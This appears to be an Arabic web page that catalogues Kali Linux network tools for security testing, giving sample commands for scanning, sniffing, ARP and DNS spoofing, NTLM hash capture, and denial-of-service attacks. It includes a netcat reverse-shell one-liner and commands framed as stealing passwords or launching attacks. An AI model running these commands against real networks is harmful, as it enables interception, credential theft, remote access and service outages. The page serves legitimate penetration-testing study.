أدوات الشبكات

دليل متكامل لأدوات اختبار وتحليل أمان الشبكات في Kali Linux

25+ أداة
6 تصنيفات
100+ أمر
عرض 25 من 25 أداة
ماسحات الشبكة 6
متشممون 4
تحليل البروتوكولات 5
تزوير وهجمات 5
تعداد وتجميع 3
هجمات الحرمان 2

ماسحات الشبكة

أدوات اكتشاف الأجهزة والخدمات في الشبكة
6 أدوات

Nmap

الأداة الذهبية

أشهر ماسح شبكات في العالم - يستخدم لاكتشاف الأجهزة والمنافذ والخدمات

فحص المنافذ كشف نظام التشغيل فحص الثغرات
nmap -sS 192.168.1.1 SYN Scan سريع
nmap -A -T4 target.com فحص متقدم
nmap -p 1-65535 -sV 10.0.0.1 فحص جميع المنافذ

الاستخدامات:

  • اكتشاف الأجهزة في الشبكة
  • فحص الثغرات الأمنية
  • تدقيق جدران الحماية

Zenmap

الواجهة الرسومية

الواجهة الرسومية الرسمية لـ Nmap - تسهل استخدام الأداة للمبتدئين

واجهة رسومية حفظ الفحوصات تصدير النتائج
zenmap تشغيل الواجهة

Masscan

الأسرع

أسرع ماسح شبكات في العالم - يمكنه فحص الإنترنت بالكامل في دقائق

سرعة خارقة فحص مليون منفذ/ثانية متوافق مع Nmap
masscan 192.168.1.0/24 -p80 فحص المنفذ 80
masscan 0.0.0.0/0 -p443 --rate=10000 فحص HTTPS عالمي

Netdiscover

الشبكات المحلية

أداة اكتشاف الأجهزة في الشبكات المحلية - تعمل بـ ARP

فحص ARP وضع المراقبة لا يحتاج IP
netdiscover -r 192.168.1.0/24 فحص النطاق
netdiscover -p وضع المراقبة

Unicornscan

المتقدم

ماسح شبكات متقدم - يجمع بين الفحص وجمع المعلومات

بصمة TCP/IP فحص غير متزامن تحليل الخدمات
unicornscan 192.168.1.1 فحص أساسي
unicornscan -Iv 10.0.0.1:1-1000 فحص متقدم

Angry IP Scanner

خفيف وسريع

أداة فحص IP بسيطة وسريعة - تدعم Ping والمنافذ

واجهة رسومية متعددة المنصات تصدير النتائج
ipscan تشغيل الأداة

متشممون الشبكة

أدوات التقاط وتحليل حزم الشبكة
4 أدوات

Wireshark

ملك المتشممين

أشهر وأقوى محلل حزم شبكات في العالم - واجهة رسومية متطورة

التقاط الحزم تحليل 1000+ بروتوكول فلاتر متقدمة
wireshark تشغيل الواجهة
tshark -i eth0 سطر أوامر

Tcpdump

أداة سطر الأوامر

أداة التقاط الحزم في سطر الأوامر - خفيفة وسريعة

بدون واجهة رسومية فلاتر BPF حفظ كـ PCAP
tcpdump -i eth0 التقاط مباشر
tcpdump -r capture.pcap قراءة ملف
tcpdump port 80 فلتر HTTP

Dsniff

سرقة البيانات

مجموعة أدوات لاعتراض وتحليل حركة الشبكة وكلمات المرور

سرقة كلمات المرور هجمات MITM تحليل DNS
dsniff -i eth0 سرقة كلمات المرور
urlsnarf -i eth0 اعتراض URLs

Ngrep

بحث في الحزم

أداة grep للحزم - تبحث عن أنماط محددة في حركة الشبكة

بحث بالـ Regex فلتر متقدم عرض نصي
ngrep -i "password" port 80 بحث عن كلمة مرور
ngrep -d eth0 مراقبة واجهة

تحليل البروتوكولات

أدوات تحليل واختبار بروتوكولات الشبكة
5 أدوات

Ettercap

هجمات MITM

أداة شاملة لهجمات الرجل في الوسط - تحليل وتسمم البروتوكولات

ARP poisoning تسمم DNS اعتراض SSL
ettercap -G واجهة رسومية
ettercap -T -M arp /192.168.1.1/ /192.168.1.2/ ARP poisoning

Bettercap

الجيل الجديد

إطار عمل متطور لهجمات الشبكات - بديل Ettercap الحديث

HTTP/HTTPS interception WiFi attacks Bluetooth attacks
bettercap واجهة تفاعلية
net.probe on استكشاف الشبكة
arp.spoof on تسمم ARP

Netcat

سكين الجيش السويسري

أداة متعددة الاستخدامات لقراءة وكتابة البيانات عبر الشبكة

ماسح منافذ نقل ملفات شل عكسي
nc -lvp 4444 خادم استماع
nc 192.168.1.1 80 اتصال بـ HTTP
nc -e /bin/sh 10.0.0.1 4444 شل عكسي

Socat

Netcat on steroids

نسخة متقدمة من Netcat مع دعم بروتوكولات أكثر

إعادة توجيه المنافذ SSL/TLS SOCKS proxy
socat TCP-LISTEN:80 TCP4:192.168.1.1:80 إعادة توجيه
socat - OPENSSL:example.com:443 اتصال SSL

Hping3

حزم مخصصة

أداة لإنشاء وإرسال حزم TCP/IP مخصصة - تحليل واختبار

حزم مخصصة تجاوز جدران الحماية بصمة OS
hping3 -S -p 80 192.168.1.1 SYN scan
hping3 -1 10.0.0.1 ICMP ping
hping3 --flood -a TARGET اختبار تحمل

هجمات التزوير والاعتراض

أدوات هجمات MITM والتزوير
5 أدوات

Arpspoof

تزوير ARP

أداة لتزوير جدول ARP - اعتراض حركة المرور بين جهازين

ARP poisoning اعتراض ثنائي إعادة توجيه
arpspoof -i eth0 -t 192.168.1.1 192.168.1.2 تزوير ARP
echo 1 > /proc/sys/net/ipv4/ip_forward تفعيل التوجيه

Dnsspoof

تزوير DNS

تزوير استجابات DNS - توجيه الضحايا لمواقع مزيفة

تسميم DNS cache إعادة توجيه هجمات فيشينج
dnsspoof -i eth0 -f hosts.txt تزوير DNS
echo "192.168.1.100 google.com" > hosts.txt إعداد التزوير

Macchanger

تغيير MAC

تغيير عنوان MAC لبطاقة الشبكة - إخفاء الهوية وتجاوز الفلاتر

تزوير MAC إخفاء الهوية توليد عشوائي
macchanger -r wlan0 عشوائي
macchanger -m 00:11:22:33:44:55 wlan0 تغيير يدوي

Responder

LLMNR/NBT-NS

أداة لاعتراض مصادقات LLMNR و NBT-NS - سرقة تجزئات NTLM

اعتراض LLMNR سرقة NTLMv2 خادم SMB
responder -I eth0 تشغيل الأداة
responder -I eth0 -w مع WPAD

Mitmproxy

اعتراض HTTP/HTTPS

وكيل اعتراض متقدم لـ HTTP/HTTPS - تحليل وتعديل الطلبات

اعتراض SSL تعديل الحزم واجهة ويب
mitmproxy واجهة تفاعلية
mitmdump سطر أوامر

تعداد وتجميع المعلومات

أدوات جمع المعلومات وتعداد الشبكة
3 أدوات

Nbtscan

NetBIOS

مسح أسماء NetBIOS - جمع معلومات عن أجهزة Windows

أسماء الأجهزة مجموعات العمل عناوين MAC
nbtscan 192.168.1.0/24 مسح الشبكة
nbtscan -v 10.0.0.1 مفصل

Smbclient

SMB/CIFS

عميل SMB لاستعراض ومشاركة الملفات مع أنظمة Windows

استعراض المشاركات نقل ملفات فحص الثغرات
smbclient -L 192.168.1.1 قائمة المشاركات
smbclient //192.168.1.1/share الاتصال

Enum4linux

Windows enumeration

تعداد شامل لأجهزة Windows - مستخدمين، مشاركات، سياسات

قوائم المستخدمين مجموعات سياسات الأمان
enum4linux 192.168.1.1 تعداد كامل
enum4linux -U 10.0.0.1 قائمة المستخدمين

هجمات الحرمان من الخدمة

أدوات اختبار تحمل الأنظمة
2 أدوات

Slowloris

هجوم بطيء

هجوم DoS يعتمد على إبقاء اتصالات HTTP مفتوحة لأطول وقت

استهلاك الاتصالات قليل النطاق ضد Apache
slowloris target.com بدء الهجوم

THC-SSL-DoS

هجوم SSL

هجوم DoS على خوادم SSL - استهلاك موارد إعادة التفاوض

هجوم SSL Renegotiation استهلاك CPU فعال
thc-ssl-dos target.com 443 بدء الهجوم

مرجع سريع لأوامر الشبكات

فحص الشبكة

nmap -sn 192.168.1.0/24 اكتشاف الأجهزة

فحص المنافذ

nmap -p 1-1000 -sV 10.0.0.1 المنافذ المفتوحة

التقاط الحزم

tcpdump -i eth0 -w capture.pcap حفظ الحركة

تزوير ARP

arpspoof -i eth0 -t 192.168.1.1 192.168.1.2 اعتراض